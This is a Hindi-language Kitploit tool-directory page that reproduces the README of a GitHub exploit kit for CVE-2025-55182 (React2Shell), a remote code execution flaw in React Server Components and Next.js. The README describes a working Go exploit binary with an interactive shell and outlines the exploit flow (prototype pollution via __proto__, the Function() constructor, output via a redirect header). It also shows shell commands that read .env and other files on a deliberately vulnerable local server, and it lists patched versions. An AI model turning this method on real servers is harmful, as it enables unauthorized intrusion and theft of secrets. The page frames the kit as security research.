Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — यह प्रोजेक्ट CVE-2025-55182 (React2Shell) का पूर्ण कार्यात्मक प्रदर्शन प्रदान करता है - React सर्वर घटकों और Next.js में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/subhdotsol/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubsubhdotsol/cve-2025-55182

CVE-2025-55182

यह प्रोजेक्ट CVE-2025-55182 (React2Shell) का पूर्ण कार्यात्मक प्रदर्शन प्रदान करता है - React सर्वर घटकों और Next.js में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता।

289 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 (React2Shell) एक्सप्लॉइट किट

🎯 संपूर्ण कार्यशील एक्सप्लॉइट प्रदर्शन

यह प्रोजेक्ट CVE-2025-55182 (React2Shell) का पूरी तरह कार्यशील प्रदर्शन प्रदान करता है - रिएक्ट सर्वर कंपोनेंट्स और Next.js में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता।

स्थिति: ✅ कार्यशील - कमजोर सर्वरों पर वास्तविक कमांड निष्पादन प्राप्त करता है

🚀 इसमें शामिल है

कार्यशील एक्सप्लॉइट बाइनरी

  • भाषा: Go 1.25.5
  • बाइनरी: CVE-2025-55182 (7.8MB संकलित निष्पादन योग्य)
  • क्षमताएं:
    • कमजोर Next.js सर्वरों पर इंटरैक्टिव RCE शेल
    • अंतर्निहित फ़ाइल संचालन (cat, vi, touch, echo, rm)
    • आउटपुट पार्सिंग के साथ कमांड निष्पादन
    • फ़ाइल पढ़ना, लिखना और संपादित करना

कमजोर टेस्ट सर्वर

  • Next.js: 15.0.1 (जानबूझकर कमजोर)
  • React: 19.0.0 (जानबूझकर कमजोर)
  • सर्वर एक्शन: सक्षम
  • पोर्ट: http://localhost:3001

🎥 डेमो

📥 डेमो वीडियो डाउनलोड करें (5.6MB) - क्लिक करें और एक्सप्लॉइट को क्रियान्वित देखें

डेमो में क्या दिखाया गया है:

  • कमजोर Next.js सर्वर प्रारंभ करना
  • CVE-2025-55182 एक्सप्लॉइट चलाना
  • कमांड निष्पादन के साथ इंटरैक्टिव शेल
  • फ़ाइल संचालन (cat, vi, touch, rm)
  • संवेदनशील फ़ाइलें पढ़ना (package.json, .env)

✨ त्वरित आरंभ

1. कमजोर सर्वर प्रारंभ करें

cd exploited-server
npm run dev
# सर्वर http://localhost:3001 पर शुरू होता है

2. एक्सप्लॉइट चलाएं

cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182

# पूछे जाने पर:
Target: localhost:3001

3. कमांड निष्पादित करें

मूल कमांड:

subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname

फ़ाइल संचालन:

subh@rce $ touch hello.txt
[+] बनाई गई: hello.txt

subh@rce $ vi hello.txt
[i] नई सामग्री दर्ज करें (समाप्त करने के लिए एक अलग पंक्ति पर 'EOF' टाइप करें):
Hello World!
EOF
[+] फ़ाइल सहेजी गई: hello.txt

subh@rce $ cat hello.txt
Hello World!

subh@rce $ echo "नई सामग्री" > hello.txt
[+] फ़ाइल लिखी गई

subh@rce $ rm hello.txt
[+] हटाया गया: hello.txt

सिस्टम जानकारी:

subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux

बाहर निकलें:

subh@rce $ exit

📋 CVE-2025-55182 विवरण

  • CVE ID: CVE-2025-55182
  • नाम: React2Shell
  • CVSS स्कोर: 10.0 (गंभीर)
  • प्रकार: अनप्रमाणित रिमोट कोड निष्पादन
  • हमला वेक्टर: नेटवर्क
  • प्रभावित: React 19.0.0-19.2.0, Next.js 15.x-16.x सर्वर एक्शन के साथ

🎓 शैक्षिक मूल्य

यह प्रोजेक्ट प्रदर्शित करता है:

✅ वास्तविक शोषण - कमजोर सिस्टम पर वास्तविक कार्यशील RCE
✅ सुरक्षा अनुसंधान - आधुनिक वेब फ्रेमवर्क की कमजोरियों को समझना
✅ Go विकास - सुरक्षा उपकरणों को संकलित और उपयोग करना
✅ भेद्यता विश्लेषण - CVE अनुसंधान और शोषण तकनीक
✅ जिम्मेदार प्रकटीकरण - नैतिक सुरक्षा परीक्षण प्रथाएँ

🏗️ प्रोजेक्ट संरचना

react-2-shell-demo/
├── CVE-2025-55182           # संकलित Go एक्सप्लॉइट बाइनरी
├── main.go                  # Go स्रोत कोड
├── exploited-server/        # कमजोर Next.js ऐप
│   ├── app/
│   │   ├── actions.ts       # सर्वर एक्शन (कमजोर)
│   │   └── page.tsx         # चेतावनी UI
│   └── package.json         # Next 15.0.1, React 19.0.0
└── *.md                     # दस्तावेज़ीकरण

🎯 यह कैसे काम करता है

भेद्यता

CVE-2025-55182 रिएक्ट सर्वर कंपोनेंट्स में असुरक्षित डिसीरियलाइज़ेशन का शोषण करता है:

  1. हमला वेक्टर: दुर्भावनापूर्ण HTTP POST निर्मित मल्टीपार्ट पेलोड के साथ
  2. शोषण: __proto__ के माध्यम से प्रोटोटाइप प्रदूषण
  3. ट्रिगर: नकली चंक जो Function() कंस्ट्रक्टर को आमंत्रित करते हैं
  4. परिणाम: Node.js संदर्भ में मनमाना कोड निष्पादन

एक्सप्लॉइट प्रवाह

1. दुर्भावनापूर्ण चंक के साथ मल्टीपार्ट पेलोड तैयार करें
2. Next.js सर्वर एक्शन एंडपॉइंट पर भेजें
3. __proto__:then के माध्यम से प्रोटोटाइप प्रदूषण ट्रिगर करें
4. कमांड के साथ Function() कंस्ट्रक्टर आमंत्रित करें
5. कोड निष्पादित करें और रीडायरेक्ट के माध्यम से आउटपुट लौटाएं
6. X-Action-Redirect हेडर से परिणाम पार्स करें

⚠️ सुरक्षा चेतावनी

महत्वपूर्ण सूचनाएं:

  • ⛔ कमजोर सर्वर जानबूझकर है - इसे इंटरनेट पर उजागर न करें
  • ⛔ केवल अधिकृत परीक्षण के लिए उपयोग करें - अनुमति के बिना अवैध
  • ⛔ शैक्षिक उद्देश्य - सुरक्षा अनुसंधान और सीखना
  • ⛔ नैतिक उपयोग आवश्यक - जिम्मेदार प्रकटीकरण का पालन करें

📚 दस्तावेज़ीकरण

  • README.md - यह फ़ाइल
  • GO_EXPLOIT_USAGE.md - विस्तृत एक्सप्लॉइट उपयोग
  • VULNERABLE_SERVER.md - सर्वर सेटअप गाइड
  • EXPLOITATION_GUIDE.md - तकनीकी गहन जानकारी
  • USAGE.md - उपयोग उदाहरण और कमांड

🔧 आवश्यकताएं

  • Go: 1.25+ (स्रोत से संकलन के लिए)
  • Node.js: 18+ (कमजोर सर्वर चलाने के लिए)
  • npm: नवीनतम संस्करण
  • OS: macOS, Linux, या Windows

🎯 परीक्षण कार्यप्रवाह

  1. ✅ कमजोर सर्वर सेटअप करें (exploited-server में npm run dev)
  2. ✅ एक्सप्लॉइट बाइनरी चलाएं (./CVE-2025-55182)
  3. ✅ लक्ष्य दर्ज करें (localhost:3001)
  4. ✅ इंटरैक्टिव शेल प्राप्त करें (subh@rce $)
  5. ✅ कमांड निष्पादित करें (whoami, ls, cat, आदि)
  6. ✅ समाप्त होने पर बाहर निकलें (exit कमांड)

🌟 प्रमुख उपलब्धियां

यह प्रोजेक्ट सफलतापूर्वक प्रदर्शित करता है:

  • ✅ CVE-2025-55182 के विरुद्ध कार्यशील RCE एक्सप्लॉइट
  • ✅ कमजोर सर्वरों पर इंटरैक्टिव कमांड शेल
  • ✅ सेटअप से निष्पादन तक संपूर्ण शोषण कार्यप्रवाह
  • ✅ वास्तविक दुनिया के उपकरणों के साथ शैक्षिक सुरक्षा अनुसंधान
  • ✅ नियंत्रित वातावरण में जिम्मेदार भेद्यता परीक्षण

🛡️ शमन

उत्पादन सिस्टम के लिए:

  1. तुरंत अपडेट करें पैच किए गए संस्करणों पर:

    • Next.js: 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+, 16.0.7+
    • React: 19.0.1+, 19.1.2+, 19.2.1+
  2. रहस्य घुमाएं यदि 4 दिसंबर, 2025 से पहले उजागर हुए हों

  3. लॉग की निगरानी करें संदिग्ध सर्वर एक्शन गतिविधि के लिए

  4. एप्लिकेशन का ऑडिट करें जो सर्वर कंपोनेंट्स का उपयोग करते हैं

📖 और जानें

  • CVE-2025-55182 आधिकारिक रिकॉर्ड
  • Next.js सुरक्षा सलाह
  • Wiz Research: React2Shell

👨‍💻 लेखक

@subhdotsol - शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए

📜 लाइसेंस

यह कोड शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।


याद रखें: परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें। जिम्मेदारी से उपयोग करें! 🔒

टूल डाउनलोड करें